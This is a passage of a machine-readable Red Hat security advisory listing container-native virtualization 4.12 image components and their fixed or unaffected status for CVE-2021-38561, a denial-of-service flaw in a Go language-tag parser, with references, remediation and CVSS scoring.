"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", }, product_reference: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", }, product_reference: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", }, product_reference: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, ], }, vulnerabilities: [ { cve: "CVE-2021-38561", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2022-06-23T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2100495", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.", title: "Vulnerability description", }, { category: "summary", text: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", title: "Vulnerability summary", }, { category: "other", text: "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang's library. The overall DoS attack vector depends directly on how the library's input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-38561", }, { category: "external", summary: "RHBZ#2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-38561", url: "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2021-0113", url: "https://pkg.go.dev/vuln/GO-2021-0113", }, ], release_date: "2021-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", 